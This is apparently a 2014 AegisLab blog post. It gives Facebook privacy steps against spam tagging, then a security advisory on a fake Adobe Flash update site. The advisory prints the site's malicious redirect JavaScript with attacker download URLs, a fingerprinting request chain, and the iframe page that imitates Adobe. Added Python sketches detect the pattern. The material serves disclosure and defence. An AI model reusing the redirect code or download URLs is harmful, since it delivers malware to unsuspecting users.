
Friday, March 7, 2014

Knowledge sharing: strengthen your Facebook privacy settings to shut out malicious behavior and stop annoying shopping-community tags. Plus an important notice: beware of the fake Adobe malicious website that looks 100% real and updates in sync with the original (Security Advisory 2014-02-27)


A lot of shopping fan pages that tag people have been showing up on the wall, selling all sorts of goods: shoes, clothes, bags and so on. The product photos carry a Line ID.

The most annoying part is that each photo tags a large number of people, so it keeps appearing on your Facebook wall. Look closely and you will see that everyone in these photos was tagged by the same person (as shown in the image below).

It turns out that the account of the person who tagged everyone in the photos had been stolen. Once the attacker has taken over the account, it is used to tag that person's friends in the photos of those shopping fan pages.

AegisLab offers a short walkthrough of a few settings here, so that you are no longer bothered by tags from these shopping fan communities.

1) First, open "Timeline and Tagging" in your Facebook account settings. We will set two options: "Who can add posts to my timeline?" and "How can I manage tags people add and tagging suggestions?"
2) Set "Who can add posts to my timeline?"

Who can post on your timeline? This can be set to "Friends" or "Only Me".

Set it to "Only Me" and you no longer have to worry about a friend with a stolen account posting on your wall.

Review posts friends tag you in before they appear on your timeline? This can be set to "Enabled" or "Disabled".

Set it to "Enabled" so that every post that tags you has to pass your review before it appears on your timeline.
















3) Set "How can I manage tags people add and tagging suggestions?"

Review tags people add to your own posts before the tags appear on Facebook? This can be set to "Enabled" or "Disabled".

Set it to "Enabled" so that whenever someone wants to tag you, the tag is allowed only after you have reviewed it.
When you are tagged in a post, who do you want to add to the audience if they are not already in it? This can be set to "Friends", "Only Me" or "Custom".

Set it to "Only Me" so that when you are tagged in a post, only you see that post and your friends do not.






Who sees name tag suggestions when photos that look like you are uploaded? This can be set to "Friends" or "No One".

Set it to "No One" so that when a photo resembling you is uploaded, no name tag suggestion for you appears.











Follow the steps above and those annoying shopping communities can only tag you after you approve it, and posts you are tagged in are visible only to you, so your friends on Facebook are not affected.

These steps only strengthen your own privacy settings. The people around you also need to know why these settings matter; only then will the annoying advertising on Facebook walls decrease.

These privacy settings only treat the symptoms. Good usage habits and basic security awareness are the real cure.

How do you find out which pages you have liked, and how do you undo a like?
1) Click "Activity Log".




2) Click "Likes", then "Pages and Interests".










3) Click the edit button at the upper right of the page entry to "Unlike" the page or to report it.

------------------------------------------------------------------------
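One more important notice: beware of the fake Adobe malicious website that looks 100% real and updates in sync with the original (Security Advisory 2014-02-27)

AegisLab recently found a malicious website: hxxp://www.ajyadgroup.net/old/ajyad_cpanel/ckeditor/_samples/api_dialog/js.html

The path shows that this malicious js.html sits in the ckeditor directory under cpanel.

cPanel is a back-end management system that lets you administer your website through a web interface.

CKEditor is a WYSIWYG text editor used on web pages.

Vulnerabilities in these two components are reported from time to time:

cPanel Security = https://cpanel.net/category/security/

CKEditor 3.6.1 File Upload Vulnerability = http://www.bugsearch.net/en/13642/ckeditor-361-file-upload-vulnerability.html

CKEditor 4.0.1 - Multiple Vulnerabilities = http://www.exploit-db.com/exploits/24530/

We suspect that a problem in these two components is what allowed the attacker to drop the malicious js.html into that directory.

The site first determines your browser type and version, operating system, IP, Flash version, Adobe Reader version and similar information, then sends you to one of several URLs to download a fake Flash Player installer. Part of the source code follows: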

if ("" == "Windows 8") {
        if ( cr == "sr" ) {
            window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.1.exe");
        } else if ( cr == "ils" ) {
            window.location.assign("http://adobeflashupdates.com/download/Flash Player IE 11.9.9.exe");
        } else if ( cr == "ars" ) {
            window.location.assign("http://adobeflashupdates.com/download/FlashPlayer IE 11.9.exe");
        } else if ( cr == "ila" ) {
            window.location.assign("http://adobeflashupdate1.com/download/install_flashplayer12.0.8.44.exe");
        } else {
            window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.exe");
        }
} else {
        if ("" == "IE") {
        //alert("An update to your Adobe Flash Player is available");
            if ( cr == "sr" ) {
                window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.1.exe");
            } else if ( cr == "ils" ) {
                window.location.assign("http://adobeflashupdates.com/download/Flash Player IE 11.9.9.exe");
            } else if ( cr == "ars" ) {
                window.location.assign("http://adobeflashupdates.com/download/FlashPlayer IE 11.9.exe");
            } else if ( cr == "ila" ) {
                window.location.assign("http://adobeflashupdate1.com/download/instalflashplayer12.0.0.44_ie.exe");
            } else {
                window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.exe");
            }
        } else {
            //alert("An update to your Adobe Flash Player is available");
            if ( cr == "sr" ) {
                window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.1.exe");
            } else if ( cr == "ils" ) {
                window.location.assign("http://adobeflashupdates.com/download/Flash Player non IE 11.9.9.exe");
            } else if ( cr == "ars" ) {
                window.location.assign("http://adobeflashupdates.com/download/FlashPlayer non IE 11.9.exe");
            } else if ( cr == "ila" ) {
                window.location.assign("http://adobeflashupdate1.com/download/installflashplayer12.0.0.44.exe");
            } else {
                window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.exe");
            }
        }
}

The malicious flow AegisLab tested:
hxxp://www.ajyadgroup.net/old/ajyad_cpanel/ckeditor/_samples/api_dialog/js.html
→ hxxp://142.0.79.184/agent/agent.php?cr=ila
→ hxxp://142.0.79.184/agent/agent_check.php?ip=114.44.216.107&cr=ila
→ hxxp://142.0.79.184/agent/agent_save.php?cr=ila&Browser_Type=IE&Browser_Version=6.0&OS=Windows+XP&OS_Version=&IP=114.44.216.107&referer=&Flash=11,5,502,146&Shockwave=null&Silverlight=null&VLC=null&WindowsMediaPlayer=9,0,0,3250&PDFReader=null&AdobeReader=9,5,0,0&DevalVR=null&QuickTime=null&RealPlayer=null&IE_ActiveX=true
The fake Flash Player installer that is finally downloaded: hxxp://adobeflashupdate1.com/download/instalflashplayer12.0.0.44_ie.exe
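
The flow above leaves two things a web proxy log can be searched for: a request whose query string reports the browser and plugin inventory, followed by a Flash-named .exe fetched from a host that is not Adobe's. The sketch below is an added example, not code from the original post or from AegisLab; the log format ("client url"), the client addresses, the `min_keys` threshold and the vendor host list are assumptions.

```python
from urllib.parse import parse_qs, urlsplit

# Parameter names taken from the agent_save.php request in the flow above.
INVENTORY_KEYS = {"browser_type", "browser_version", "os", "flash", "shockwave",
                  "silverlight", "adobereader", "pdfreader", "quicktime",
                  "realplayer", "windowsmediaplayer", "ie_activex"}
# Assumption: the only hosts you accept Flash installers from.
VENDOR_HOSTS = ("adobe.com", "macromedia.com")

def refang(url):
    """Turn a defanged hxxp:// indicator back into a parseable URL."""
    return url.replace("hxxp", "http", 1) if url.startswith("hxxp") else url

def is_inventory_beacon(url, min_keys=4):
    """True when one query string reports several browser/plugin versions."""
    query = parse_qs(urlsplit(refang(url)).query, keep_blank_values=True)
    return len(INVENTORY_KEYS & {k.lower() for k in query}) >= min_keys

def is_fake_flash_download(url):
    """True for an .exe named like a Flash installer on a non-vendor host."""
    parts = urlsplit(refang(url))
    host = (parts.hostname or "").lower()
    name = parts.path.rsplit("/", 1)[-1].lower()
    vendor = any(host == v or host.endswith("." + v) for v in VENDOR_HOSTS)
    return name.endswith(".exe") and "flash" in name and not vendor

def find_chains(log_lines):
    """Clients that sent an inventory beacon and later fetched such an .exe."""
    beaconed, hits = set(), []
    for line in log_lines:
        client, url = line.split(None, 1)
        url = url.strip()
        if is_inventory_beacon(url):
            beaconed.add(client)
        elif client in beaconed and is_fake_flash_download(url):
            hits.append((client, url))
    return hits

# Constructed proxy log ("client url"); the URLs are shortened from the flow above.
SAMPLE_LOG = [
    "192.0.2.10 hxxp://142.0.79.184/agent/agent.php?cr=ila",
    "192.0.2.10 hxxp://142.0.79.184/agent/agent_save.php?cr=ila&Browser_Type=IE&OS=Windows+XP&Flash=11,5,502,146&AdobeReader=9,5,0,0&IE_ActiveX=true",
    "192.0.2.10 hxxp://adobeflashupdate1.com/download/instalflashplayer12.0.0.44_ie.exe",
    "192.0.2.11 hxxp://adobeflashupdate1.com/download/instalflashplayer12.0.0.44_ie.exe",
]

if __name__ == "__main__":
    print(find_chains(SAMPLE_LOG))
```

Only the first client is reported, because it sent the inventory request before the download; the second client's download alone can still be caught by `is_fake_flash_download`.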










































--------------------------------
This fake Flash Player is malware. Its detection rate on VirusTotal is 23/48: https://www.virustotal.com/en/file/a54cb6c8b5989c76a942ca9350a53d4c3c9068a647ec5bb697e16c12c1c83f50/analysis/

Interestingly, the host of the final PE download URL, adobeflashupdate1.com, serves a page that looks exactly like the real thing. Is this really an official Adobe site?
The Adobe logo link at the upper left also points to www.adobe.com, but the page source reveals the truth:
<html>
<body>
 
<iframe src="http://www.adobe.com" width="100%" height="100%" frameBorder="0">
<p>Your browser does not support iframes.</p>
</iframe>
 
</body>
</html>
It turns out the page simply embeds www.adobe.com in an iframe, which is why it looks identical to Adobe's official site.

Detection rate for adobeflashupdate1.com on VirusTotal: 7/53: https://www.virustotal.com/en/url/3e8f7243be9d55d2182a6c5d26028f2721bb6ce7375c9eec37a45eff740df064/analysis/

AegisLab WebGuard has added [D]adobeflashupdate1.com to its blocking rules. Customers are reminded to keep their WebGuard signatures up to date.
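
The wrapper page shown above has a recognisable shape: almost no content of its own and one full-size iframe that loads another host. The check below is an added example, not code from the original post or from AegisLab; the function name, the `max_text` threshold and the benign sample page are assumptions, while `FAKE_PAGE` is the source quoted above.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

class _FrameScan(HTMLParser):
    """Collect iframe attributes and the text that sits outside any iframe."""
    def __init__(self):
        super().__init__()
        self.frames, self.text, self._depth = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.frames.append(dict(attrs))  # attribute names arrive lowercased
            self._depth += 1

    def handle_endtag(self, tag):
        if tag == "iframe" and self._depth:
            self._depth -= 1

    def handle_data(self, data):
        if not self._depth and data.strip():  # ignore the iframe fallback text
            self.text.append(data.strip())

def is_full_page_wrapper(html, serving_host, max_text=40):
    """Return the framed host if the page is little more than a 100% x 100%
    iframe of a different host, otherwise None."""
    scan = _FrameScan()
    scan.feed(html)
    scan.close()
    own_text = sum(len(t) for t in scan.text)
    for frame in scan.frames:
        src_host = (urlsplit(frame.get("src") or "").hostname or "").lower()
        full = frame.get("width") == "100%" and frame.get("height") == "100%"
        foreign = bool(src_host) and src_host != serving_host.lower()
        if full and foreign and own_text <= max_text:
            return src_host
    return None

# Page source quoted in the post above.
FAKE_PAGE = """<html><body>
<iframe src="http://www.adobe.com" width="100%" height="100%" frameBorder="0">
<p>Your browser does not support iframes.</p>
</iframe>
</body></html>"""

# Constructed benign page: real content plus a small embedded player.
BENIGN_PAGE = """<html><body><h1>Release notes</h1>
<p>This month's update fixes several rendering problems in the editor.</p>
<iframe src="https://video.example/embed/1" width="560" height="315"></iframe>
</body></html>"""

if __name__ == "__main__":
    print(is_full_page_wrapper(FAKE_PAGE, "adobeflashupdate1.com"))
    print(is_full_page_wrapper(BENIGN_PAGE, "blog.example"))
```

A site that does not want to be wrapped this way can refuse cross-origin framing with the `X-Frame-Options` response header or the CSP `frame-ancestors` directive.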

===Sincerely === THE END === Melody.Blogger~===>/
